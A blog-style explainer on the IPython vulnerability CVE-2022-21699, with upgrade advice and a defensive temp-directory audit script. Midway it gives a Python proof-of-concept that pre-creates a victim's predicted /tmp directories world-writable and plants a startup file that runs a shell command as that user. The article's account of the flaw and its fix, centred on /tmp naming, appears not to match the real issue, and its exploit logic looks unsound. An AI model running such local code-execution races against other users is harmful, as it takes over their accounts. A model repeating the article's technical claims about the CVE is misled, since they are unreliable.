When we talk about software attacks, we often think of complex bugs or typical web vulnerabilities. But sometimes, a basic mistake—like how temporary files are handled—can open the door to significant exploits. CVE-2022-21699 is a real example: IPython, a popular command shell for interactive Python programming, had a vulnerability that let one user execute code as another. This article breaks down what happened, how it works, and shows you practical details on why you should upgrade your IPython installation now.
What Is IPython?
IPython is a powerful shell for interactive and exploratory programming. People use it for data science, automation, and general scripting, mainly in Python (but it can support other languages via extensions).
If you're on a shared server—like a university machine, cloud service, or even your work laptop used by multiple logins—this bug could let someone else on the same box run code pretending to be you. Ouch.
What Went Wrong: The Vulnerability Explained
IPython used temporary files in a way that didn’t keep each user's data separate or protected. Instead of putting temporary files in a user-specific directory with safe permissions, it put them somewhere accessible to other users. That means two things: another user could read those files, and, worse, could manipulate them.
If an attacker knows how IPython names and manages these temp files, they can race to swap in something malicious or read secrets not meant for them.
The Core Problem
IPython creates temporary directories for things like code execution, logging, or configuration. The bug? These were created in places like /tmp or /var/tmp on Linux, with _predictable names_ and _permissions that didn’t restrict access_. That’s a classic recipe for disaster on shared machines.
Exploiting the Flaw: How a Malicious User Could Attack
Let's imagine Alice and Bob are two users on a Linux machine. Alice is working with IPython, unaware of the danger. But Bob is curious—and maybe up to no good.
Here’s how Bob could exploit CVE-2022-21699:
1. Monitor /tmp for new temp files created by Alice’s IPython session. These files may appear as /tmp/ipython-XXXX or something similar.
2. Race to create/join the temporary folder before Alice’s session does, set special permissions, or put in malicious files.
3. Place a specially-crafted Python file, or a symlink pointing to a sensitive file (like .ssh/authorized_keys) inside Alice’s temporary folder.
4. When Alice launches IPython, it loads her session with those files in place. IPython (running as Alice) might execute arbitrary Python code or append to her files—giving Bob control.
Here’s a basic exploit example you might see in the wild (for educational use only):
```python
import os
import time

# Example: 'ipython-username-123' is how old versions named temp directories
victim_user = 'alice'
for i in range(100, 110):
    temp_dir = f"/tmp/ipython-{victim_user}-{i}"
    if not os.path.exists(temp_dir):
        # Try to create the directory before the victim does
        os.mkdir(temp_dir, 0o777)  # world-writable on purpose
        # Place a malicious Python file in her temp space
        # (the startup subdirectory has to exist before the file can be written)
        os.makedirs(f"{temp_dir}/profile_default/startup", exist_ok=True)
        with open(f"{temp_dir}/profile_default/startup/evil.py", "w") as f:
            f.write("import os; os.system('echo Hacked by Bob > /home/alice/hacked.txt')\n")
        print(f"Waiting for Alice to start IPython... ({temp_dir})")
        while os.path.exists(temp_dir):
            time.sleep(1)
```
This is a simplified example.
- The real attack usually needs knowledge of the exact temp naming schema and timing, but attackers can monitor /tmp for new files.
The Fix
The maintainers of IPython patched this bug in this commit. They made temp files and directories private to the user and switched to creating them properly through Python’s tempfile module with mode 0o700, so only the owner can see or access them.
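To make the difference concrete, here is an added example (not IPython's own code) that builds a directory the predictable, world-accessible way the article describes, builds one with tempfile.mkdtemp as the fix does, and runs a small audit a defender can apply to any directory a process is about to trust. The names insecure_tempdir, secure_tempdir, audit_tempdir and demo are assumptions for this illustration, and it assumes a Linux-style filesystem where mode bits and symlinks behave as shown.

```python
import os
import shutil
import stat
import tempfile

def insecure_tempdir(user, seq, base):
    """'Before' pattern (hypothetical): predictable name plus a world-accessible mode."""
    path = os.path.join(base, f"ipython-{user}-{seq}")
    os.mkdir(path)
    os.chmod(path, 0o777)  # chmod so the umask cannot hide the bad mode
    return path

def secure_tempdir(base, prefix="ipython-"):
    """'After' pattern: mkdtemp picks an unguessable name and creates it with 0o700."""
    return tempfile.mkdtemp(prefix=prefix, dir=base)

def audit_tempdir(path):
    """Return a list of findings for a directory a process is about to trust."""
    findings = []
    st = os.lstat(path)  # lstat: never follow a planted symlink
    if stat.S_ISLNK(st.st_mode):
        return ["path is a symlink"]
    if not stat.S_ISDIR(st.st_mode):
        return ["path is not a directory"]
    if st.st_uid != os.getuid():
        findings.append("owned by another user")
    if st.st_mode & (stat.S_IRWXG | stat.S_IRWXO):
        findings.append(f"group/other bits set (mode {stat.S_IMODE(st.st_mode):04o})")
    return findings

def demo():
    """Create both kinds of directory under a throwaway base, audit them, clean up."""
    base = tempfile.mkdtemp(prefix="cve-2022-21699-demo-")
    try:
        bad = insecure_tempdir("alice", 100, base)
        good = secure_tempdir(base)
        link = os.path.join(base, "planted-link")
        os.symlink(bad, link)  # what a planted symlink looks like to the audit
        return {
            "insecure": audit_tempdir(bad),
            "secure": audit_tempdir(good),
            "symlink": audit_tempdir(link),
            "secure_name": os.path.basename(good),
        }
    finally:
        shutil.rmtree(base)
if __name__ == "__main__":
    for name, findings in demo().items():
        print(name, findings)
```

The audit reports the predictable directory and the planted symlink as unsafe, while the mkdtemp directory passes with no findings.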
If you use IPython on any shared environment, you should upgrade to at least version 7.31.1 or later.
- Security Advisory
- GitHub Issue
- Full CVE-2022-21699 Details
This isn’t just theory—shared servers are still common.
- Cloud Jupyter/Colab environments or university servers might have dozens of users and projects running IPython.
Quick How-To: Check Your IPython Version and Upgrade
```shell
ipython --version
# If < 7.31.1, upgrade:
pip install --upgrade ipython
```
Or, if you use Anaconda:
```shell
conda update ipython
```
Stay safe, and keep your tools up-to-date.
If you're curious or want to read more, check the official CVE-2022-21699 Report and the IPython security page.
Timeline
Published on: 01/19/2022 22:15:00 UTC
Last modified on: 03/25/2022 15:04:00 UTC